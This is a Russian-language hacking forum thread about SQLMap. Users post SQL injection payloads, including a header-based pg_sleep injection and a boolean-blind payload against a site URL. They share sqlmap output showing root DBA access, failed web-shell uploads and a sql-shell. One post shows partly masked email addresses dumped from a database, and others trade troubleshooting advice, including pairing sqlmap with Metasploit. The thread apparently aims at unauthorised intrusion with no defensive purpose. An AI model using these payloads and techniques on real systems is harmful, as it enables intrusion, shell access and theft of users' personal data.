Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. Duble

    Duble New Member

    Joined:
    28 Oct 2015
    Messages:
    30
    Likes Received:
    0
    Reputations:
    0
    Уязвимость в заголовке
    Code:
    Origin: -1;select pg_sleep(0); -- 
    Как правильно вставить в sqlmap?
    --headers="Origin:*" не прокатывает
     
  2. Axiles

    Axiles New Member

    Joined:
    14 Jan 2016
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    подскажите сливает в таком формате
    ***te89@gmail.co.uk
    ***slav.stojanov@outlook.com
    ***eneellis73@gmail.com
    ***chan@yahoo.com
    из за чего так?
     
  3. matvejcik

    matvejcik New Member

    Joined:
    22 Nov 2012
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    надо ставить оригинальный параметр. ты ставишь или пустой или уже разкрученый параметр да и в целом надо проверять ручками есть ли вообще то там дырка.
     
  4. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    40
    Likes Received:
    9
    Reputations:
    0
    Parameter: #1* (URI)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)


    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)


    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)



    [04:43:21] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0
    [04:43:21] [INFO] testing if current user is DBA
    [04:43:21] [INFO] fetching current user
    [04:43:22] [INFO] retrieved: 'root@localhost'
    current user is DBA: True


    не возможно залить шелл
    [04:44:04] [WARNING] unable to upload the file stager on '/var/www/'
    [04:44:04] [INFO] trying to upload the file stager on '/var/www/menu/-1/' via LIMIT 'LINES TERMINATED BY' method



    Не получается ничего.
    [04:45:04] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0
    [04:45:04] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
    sql-shell>
    [04:00:51] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported




    Подскажите пожалуйста что можно сделать ???
     
  5. Duble

    Duble New Member

    Joined:
    28 Oct 2015
    Messages:
    30
    Likes Received:
    0
    Reputations:
    0
    Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://site.com:80/Help/HelpIndex.html?HelpName=Earn money&ThemeID=17 AND 2864=2864
    ---
    [16:58:45] [INFO] testing MySQL
    [16:58:45] [WARNING] the back-end DBMS is not MySQL
    [16:58:45] [INFO] testing Oracle
    [16:58:45] [WARNING] the back-end DBMS is not Oracle
    [16:58:45] [INFO] testing PostgreSQL
    [16:58:45] [WARNING] the back-end DBMS is not PostgreSQL
    [16:58:45] [INFO] testing Microsoft SQL Server
    [16:58:45] [WARNING] the back-end DBMS is not Microsoft SQL Server
    [16:58:45] [INFO] testing SQLite
    [16:58:45] [WARNING] the back-end DBMS is not SQLite
    [16:58:45] [INFO] testing Microsoft Access
    [16:58:45] [WARNING] the back-end DBMS is not Microsoft Access
    [16:58:45] [INFO] testing Firebird
    [16:58:45] [WARNING] the back-end DBMS is not Firebird
    [16:58:45] [INFO] testing SAP MaxDB
    [16:58:45] [WARNING] the back-end DBMS is not SAP MaxDB
    [16:58:45] [INFO] testing Sybase
    [16:58:45] [WARNING] the back-end DBMS is not Sybase
    [16:58:45] [INFO] testing IBM DB2
    [16:58:45] [WARNING] the back-end DBMS is not IBM DB2
    [16:58:45] [INFO] testing HSQLDB
    [16:58:45] [WARNING] the back-end DBMS is not HSQLDB
    [16:58:45] [INFO] testing H2
    [16:58:45] [WARNING] the back-end DBMS is not H2
    [16:58:45] [INFO] testing Informix
    [16:58:45] [WARNING] the back-end DBMS is not Informix
    [16:58:45] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system

    [*] ending @ 16:58:45 /2020-06-28/
    Кто сталкивался? В чем проблема?
     
  6. dzhim2014

    dzhim2014 New Member

    Joined:
    18 Oct 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    На соседнем борде обсуждали что типа одна скуля не отдает DBMS а вторая может и отдать.. Ищи еще скули на сайте
    Так же грешат на WAF и предполагают что тип уязвимости - NoSQL Потому и не может определить dbms
     
  7. dzhim2014

    dzhim2014 New Member

    Joined:
    18 Oct 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Взаимодействие sqlmap и metasploit - что не так?
    Дампит нормально а коннект отказывается создавать , все пути прописаны правильно...
    Гугл поиск по запросу "unable to prompt for an out-of-band session" ничего не выдал вразумительного ..
     

    Attached Files:

Loading...